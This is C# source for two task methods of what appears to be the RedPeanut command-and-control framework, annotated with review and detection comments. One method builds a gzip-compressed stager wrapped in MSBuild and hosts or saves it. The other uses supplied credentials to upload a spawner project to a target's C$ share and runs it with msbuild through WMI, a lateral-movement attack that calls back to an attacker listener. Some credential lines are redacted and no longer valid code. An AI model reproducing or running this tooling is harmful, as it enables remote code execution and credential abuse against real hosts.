/// <summary>
/// Builds an MSBuild-wrapped stager for the selected listener profile and either registers the
/// generated script as a web resource on the C2 server (when <c>hosted</c> is set) or writes it
/// to the local temp directory. Does nothing when <c>filename</c>, <c>lhost</c>, <c>lport</c> or
/// <c>profile</c> is missing/invalid, or when <c>profile</c> is not a registered profile key.
/// All exceptions are caught and reported on the console by message only; nothing is rethrown.
/// </summary>
private void Run() {
    // NOTE(review): 'args' is never used in this overload.
    List <string> args = new List <string>();
    try {
        // Required inputs: filename, lhost, lport >= 1, profile >= 1. Missing input is a silent no-op.
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) {
            return;
        } else {
            // Template directory: <cwd>/WORKSPACE_FOLDER/TEMPLATE_FOLDER.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) {
                // Listener configuration for lhost:lport with the selected profile
                // (presumably the plain HTTP listener — confirm against ListenerConfig).
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                // Read the stager .cs template and substitute the agent profile / server key into it.
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                // Builder.GenerateDllBase64 (by name: compiles the source and base64-encodes the DLL);
                // the result is decoded, gzipped (CompressGZipAssembly) and re-encoded for embedding.
                string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
                byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));
                // Placeholder substitutions consumed by MSBuildGenerator.
                Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                msbuildargs.Add("#{taskname}", taskname);
                MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs);
                if (hosted) {
                    // Register the generated script on the C2 web server under 'filename'.
                    C2Manager c2manager = Program.GetC2Manager();
                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                    Console.WriteLine("[*] Resource added to webserver resources");
                    return;
                } else {
                    // Write the script to the local temp directory.
                    // NOTE(review): 'filename' is used unsanitised; a value containing path separators
                    // moves the write location outside the temp directory.
                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                }
            }
        }
    } catch (Exception e) {
        // Catch-all: compile, I/O and template failures are reported by message only; the stack trace is dropped.
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
/// <summary>
/// Builds a stager (HTTP listener, or named-pipe pivot when <c>lpipename</c> is set), wraps it
/// in a spawner and then in an MSBuild project, tasks the current <c>agent</c> to upload that
/// project to <c>\\targethost\C$\Windows\temp</c>, and finally tasks the agent to run SharpWMI so
/// that msbuild.exe executes the uploaded project on the target.
/// Does nothing when required inputs are missing, the profile is unknown, or no agent is selected.
/// Detection note: the observable artifacts this produces are a randomly named .xml under
/// Windows\temp on the target and a WMI-created msbuild.exe process from the Framework64 v4.0.30319 path.
/// All exceptions are caught and reported on the console by message only.
/// </summary>
private void Run() {
    try {
        // Required inputs: username, password, lhost, profile >= 1, and either lpipename or lport >= 1.
        if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1) {
            return;
        } else {
            // Template directory: <cwd>/WORKSPACE_FOLDER/TEMPLATE_FOLDER.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) {
                // "." is used when no domain is supplied (presumably "local machine" — confirm against the template).
                string domainname = ".";
                if (!string.IsNullOrEmpty(domain)) {
                    domainname = domain;
                }
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                if (lpipename == null) {
                    // HTTP stager, no pivot: listener at lhost:lport.
                    // NOTE(review): the guard above uses IsNullOrEmpty(lpipename) but this branch tests == null,
                    // so an empty-string lpipename with a valid lport falls into the named-pipe branch.
                    ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                } else {
                    // Named-pipe pivot stager: reaches lhost over lpipename.
                    ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                }
                // Stager compiled in memory (Builder.BuidStreamAssembly), gzipped and base64-encoded.
                // Assembly names come from System.Random (not a cryptographic source).
                string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                // Create the TaskMsg (gzip) only when an agent is selected.
                if (agent != null) {
                    // Spawner template: embeds the stager (via Builder.GenerateShellcode), the profile's Spawn
                    // setting and the supplied credentials.
                    // NOTE(review): '#DOMAIN#' receives the raw 'domain' (null removes the token), whereas the
                    // upload template below receives 'domainname' — confirm this asymmetry is intended.
                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
                        .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                        .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
                        .Replace("#USERNAME#", username)
                        .Replace("#PASSWORD#", password)
                        .Replace("#DOMAIN#", domain);
                    string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                    // Placeholder substitutions consumed by MSBuildGenerator.
                    Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                    msbuildargs.Add("#{taskname}", taskname);
                    MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);
                    // Destination on the target: the administrative C$ share, Windows\temp, random lowercase .xml name.
                    string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
                    string filename = RandomAString(10, new Random()).ToLower() + ".xml";
                    // NOTE(review): Encoding.Default is the host's ANSI code page on .NET Framework, so the
                    // uploaded bytes depend on the operator machine's locale.
                    string filesrc = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));
                    // NOTE(review): 'destinattionfull' is computed but never used.
                    string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;
                    // Backslashes are doubled, presumably because the path is substituted into C# source text.
                    // 'pathdest' and 'filename' are never empty here, so both "." and "" defaults are dead.
                    string destinationpath = ".";
                    if (!string.IsNullOrEmpty(pathdest)) {
                        destinationpath = pathdest.Replace("\\", "\\\\");
                    }
                    string destinationfilename = "";
                    if (!string.IsNullOrEmpty(filename)) {
                        destinationfilename = filename;
                    }
                    // Read the file-upload .cs template and substitute payload, destination and credentials.
                    source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                    source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);
                    string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));
                    // Task the agent to copy the MSBuild project to the target host ("pippo" looks like a dummy argument — confirm).
                    RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);
                    // Task the agent to run msbuild on the target via WMI (SharpWMI), pointing at the uploaded project.
                    List <string> args = new List <string>();
                    args.Add("action=create");
                    args.Add("computername=" + targethost);
                    // NOTE(review): the next two statements are redacted in the page as received ("******");
                    // the original expressions are not recoverable from here and are left untouched.
                    args.Add("username="******"\\" + username);
                    args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);
                    // NOTE(review): the whole argument list — which, given the "password=" key and the guard
                    // above, carries the account password in clear text — is concatenated without separators
                    // and echoed to the console, so any console capture or operator transcript retains the credential.
                    string s = "";
                    foreach (string ss in args.ToArray()) {
                        s += ss;
                    }
                    Console.WriteLine("String command: " + s);
                    RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
                }
            }
        }
    } catch (Exception e) {
        // Catch-all: compile, I/O, template and agent-tasking failures are reported by message only; the stack trace is dropped.
        Console.WriteLine("[*] Error running task build {0}", e.Message);
    }
}